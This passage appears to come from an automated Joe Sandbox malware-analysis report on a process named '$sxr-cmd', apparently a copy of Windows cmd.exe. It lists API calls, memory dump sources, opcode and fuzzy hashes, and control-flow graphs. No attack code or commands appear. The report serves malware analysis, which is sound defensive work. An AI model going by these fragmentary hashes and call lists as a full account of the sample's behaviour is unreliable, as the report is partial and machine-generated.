                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                            • String ID:
                                                                                                            • API String ID: 850181435-0
                                                                                                            • Opcode ID: 323850a57e99924bc9cf781ab4045ebe0c1eeb0e1a1d4ccf402750c0a9cf2a6e
                                                                                                            • Instruction ID: 779eba56883449fe6555408b480aac34ca8a4e3fa000a7d723cb2ea783209036
                                                                                                            • Opcode Fuzzy Hash: 323850a57e99924bc9cf781ab4045ebe0c1eeb0e1a1d4ccf402750c0a9cf2a6e
                                                                                                            • Instruction Fuzzy Hash: CD416D32618FC1C9EBA19F20D8842E9BBA4FB89B54F844135DA4D6BB48CF38D54DC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1223 7ff7137f4a14-7ff7137f4a3e GetEnvironmentStringsW 1224 7ff7137f4a40-7ff7137f4a46 1223->1224 1225 7ff7137f4aae-7ff7137f4ac5 1223->1225 1226 7ff7137f4a59-7ff7137f4a8f GetProcessHeap RtlAllocateHeap 1224->1226 1227 7ff7137f4a48-7ff7137f4a52 1224->1227 1229 7ff7137f4a91-7ff7137f4a9a memmove 1226->1229 1230 7ff7137f4a9f-7ff7137f4aa9 RtlFreeHeap 1226->1230 1227->1227 1228 7ff7137f4a54-7ff7137f4a57 1227->1228 1228->1226 1228->1227 1229->1230 1230->1225
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocateEnvironmentFreeProcessStringsmemmove
                                                                                                            • String ID:
                                                                                                            • API String ID: 2247642577-0
                                                                                                            • Opcode ID: 802b6fabda809232f6ce418b0fbabebe6d7003abc813b1358966284b18434ee4
                                                                                                            • Instruction ID: c789080e4d9b87e5bef752130d5ae65a980cded8ed73cf7c9bf347d32eb58f36
                                                                                                            • Opcode Fuzzy Hash: 802b6fabda809232f6ce418b0fbabebe6d7003abc813b1358966284b18434ee4
                                                                                                            • Instruction Fuzzy Hash: 96119122A18F4286DA90AB15A444139FBA4FB8DFA0B899134DE4E23754DF3DE4498760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$FullNamePathwcschr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1464828906-0
                                                                                                            • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                            • Instruction ID: 499d90502f660c4e71f489f367fbda59370e1dc696d8ad53d8d8bcad1fadc9ef
                                                                                                            • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                            • Instruction Fuzzy Hash: 71310321A08E1286E7A0BF15A48047EF665FB4DBA0FD48135DA6E633D0DF7DE84D8320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137E8798), ref: 00007FF7137F4AD6
                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137E8798), ref: 00007FF7137F4AEF
                                                                                                              • Part of subcall function 00007FF7137F4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A28
                                                                                                              • Part of subcall function 00007FF7137F4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A66
                                                                                                              • Part of subcall function 00007FF7137F4A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A7D
                                                                                                              • Part of subcall function 00007FF7137F4A14: memmove.MSVCRT(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A9A
                                                                                                              • Part of subcall function 00007FF7137F4A14: RtlFreeHeap.NTDLL(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4AA2
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137E8798), ref: 00007FF7137FEE64
                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF7137E8798), ref: 00007FF7137FEE78
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Free$AllocAllocateEnvironmentStringsmemmove
                                                                                                            • String ID:
                                                                                                            • API String ID: 3193623387-0
                                                                                                            • Opcode ID: 573339bfc65e46a6dc0536e612d39ff43a234acebcc174d4b54bf8b687b66270
                                                                                                            • Instruction ID: ea4029689b8f05a3e2498f5e0000999969b67e8c1bbf797644cb7af78f3475c5
                                                                                                            • Opcode Fuzzy Hash: 573339bfc65e46a6dc0536e612d39ff43a234acebcc174d4b54bf8b687b66270
                                                                                                            • Instruction Fuzzy Hash: 94F06221A15F42CBFF85A765A444178E9D2FF8EB61B88D834CD0E62340EE3CA45C8B30
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset
                                                                                                            • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                            • API String ID: 2221118986-3416068913
                                                                                                            • Opcode ID: c44a4f921b2871da75a6341d1782bc5e11e8903ade1904c719f7b607e4e2203c
                                                                                                            • Instruction ID: c513c31dd0d28facb67b109d1be6130b5ae37001a331224adc18fa99c82417d7
                                                                                                            • Opcode Fuzzy Hash: c44a4f921b2871da75a6341d1782bc5e11e8903ade1904c719f7b607e4e2203c
                                                                                                            • Instruction Fuzzy Hash: 5111A321A08E4385EFD0EB55A1842B99290AF88BB4F984331DD7D6B3D5DE3DD04C8320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memsetwcschr
                                                                                                            • String ID: 2$COMSPEC
                                                                                                            • API String ID: 1764819092-1738800741
                                                                                                            • Opcode ID: 2d0ef5fe1d299edb116169e4c9a5eff0224fc8a498bf86c607940334a72b9e92
                                                                                                            • Instruction ID: 1d8c5f4c355a7634149a6038e87c411d2acf64ca8a86a7a678e46655ba208ee0
                                                                                                            • Opcode Fuzzy Hash: 2d0ef5fe1d299edb116169e4c9a5eff0224fc8a498bf86c607940334a72b9e92
                                                                                                            • Instruction Fuzzy Hash: 26519F21A0CE4385FBE8BB259491379EA94AF4C7A4FC44231DA4DB62D5DE3CE84C8771
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 4254246844-0
                                                                                                            • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                            • Instruction ID: b2570f46169b6ac96902e3e88a3703463ba27a88868b933bd7d79ee94e5c1964
                                                                                                            • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                            • Instruction Fuzzy Hash: 31419221A08F4286FFA0AB04E484379E7A4FF89BA0F844535D96E577C0DF3CE44D8620
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                            • String ID:
                                                                                                            • API String ID: 2643372051-0
                                                                                                            • Opcode ID: 515bd75455fc8bf0b419e36a5d89a3138a905a51cbad146b731857f3ffb38bca
                                                                                                            • Instruction ID: 43c3682b023ef2b1651b88c005cc0dea68b6a810e4356ae7f9783a4f30195c77
                                                                                                            • Opcode Fuzzy Hash: 515bd75455fc8bf0b419e36a5d89a3138a905a51cbad146b731857f3ffb38bca
                                                                                                            • Instruction Fuzzy Hash: B0F08662A19F4286EB80AB66F444075EAE1FF9D7B0BD59234C57E23390DE7C949C8630
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _get_osfhandle$ConsoleMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 1591002910-0
                                                                                                            • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                            • Instruction ID: 74c8c5c2a9cfd806e016ee0cc343db5c4a71af55dabdb27aaee14228300826aa
                                                                                                            • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                            • Instruction Fuzzy Hash: ECF07038A15F02CBD744AB15E845474B7A0FB8A721FD44174C90E53310DF7EA529C730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DriveType
                                                                                                            • String ID: :
                                                                                                            • API String ID: 338552980-336475711
                                                                                                            • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                            • Instruction ID: d7d9e33b9073df5b5bc97a81d6141401db755ad9da1d5204c83f5650f7ce4510
                                                                                                            • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                            • Instruction Fuzzy Hash: 72E06566618A40CBD760AF50E45106AF7A0FB8D358FC41525D99D83764DB3CD25DCB18
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3355953691.000002155A580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002155A580000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a580000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocLibraryLoadVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3550616410-0
                                                                                                            • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction ID: 10d3d97f47581953e9336e15441d5fba1325b7f5869809364f5b99c69c15253a
                                                                                                            • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction Fuzzy Hash: 63614632702A62E7EF58CF15C454BBD7792FBA4B98FE48021EA2907785DB38D856C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7137ECD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137EB9A1,?,?,?,?,00007FF7137ED81A), ref: 00007FF7137ECDA6
                                                                                                              • Part of subcall function 00007FF7137ECD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF7137EB9A1,?,?,?,?,00007FF7137ED81A), ref: 00007FF7137ECDBD
                                                                                                            • GetConsoleTitleW.KERNELBASE ref: 00007FF7137F5B52
                                                                                                              • Part of subcall function 00007FF7137F4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7137F4297
                                                                                                              • Part of subcall function 00007FF7137F4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7137F42D7
                                                                                                              • Part of subcall function 00007FF7137F4224: memset.MSVCRT ref: 00007FF7137F42FD
                                                                                                              • Part of subcall function 00007FF7137F4224: memset.MSVCRT ref: 00007FF7137F4368
                                                                                                              • Part of subcall function 00007FF7137F4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7137F4380
                                                                                                              • Part of subcall function 00007FF7137F4224: wcsrchr.MSVCRT ref: 00007FF7137F43E6
                                                                                                              • Part of subcall function 00007FF7137F4224: lstrcmpW.KERNELBASE ref: 00007FF7137F4401
                                                                                                            • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7137F5BC7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocateInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                            • String ID:
                                                                                                            • API String ID: 346765439-0
                                                                                                            • Opcode ID: 722cf97fa004147e5ee739933938ffa1972c5aff5cae2a5bc049a9bf08618945
                                                                                                            • Instruction ID: a1d2dae8c47702359222567d1c1b3779d8c7358e5cfd2a390cee448d531d1095
                                                                                                            • Opcode Fuzzy Hash: 722cf97fa004147e5ee739933938ffa1972c5aff5cae2a5bc049a9bf08618945
                                                                                                            • Instruction Fuzzy Hash: C631B720A0CE4286FBA0B711A4D05BDE295BF8DBA0FC45135E95E67B85DE3CE50EC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentStrings$Free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3328510275-0
                                                                                                            • Opcode ID: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
                                                                                                            • Instruction ID: 0fe03692866b091e5092c9475ab346809a175269e1f7387d993380b02d75f7ac
                                                                                                            • Opcode Fuzzy Hash: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
                                                                                                            • Instruction Fuzzy Hash: 4821C532B14FA4D1EE609F12A404699E6A6F7E5BD5F884264BE8B23BD8DF3CC4558300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleType
                                                                                                            • String ID:
                                                                                                            • API String ID: 3000768030-0
                                                                                                            • Opcode ID: 886dffb09205d202da52528ad762ca177720b59a1f976d6d5f71bc5666910ac8
                                                                                                            • Instruction ID: 49b664d94c1fc750bc92424658060722a54c15f961c8e3efcfa5a5484001a480
                                                                                                            • Opcode Fuzzy Hash: 886dffb09205d202da52528ad762ca177720b59a1f976d6d5f71bc5666910ac8
                                                                                                            • Instruction Fuzzy Hash: 92310C33518F68E1EF648F1484986A86B52F396BB8FA80389FB5B073E0CB38D455C350
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • FindClose.KERNELBASE(?,?,?,00007FF71380EAC5,?,?,?,00007FF71380E925,?,?,?,?,00007FF7137EB9B1), ref: 00007FF7137F3A56
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFind
                                                                                                            • String ID:
                                                                                                            • API String ID: 1863332320-0
                                                                                                            • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                            • Instruction ID: dedb54be454d3084b282164fb4930f670bb47e07ffe3e8588aff4bf307190bd5
                                                                                                            • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                            • Instruction Fuzzy Hash: 4001C420E18E43C9F7D4A716A4D0075E6A4FF8CB60BD08530F52EA2654DE2CE49DC320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
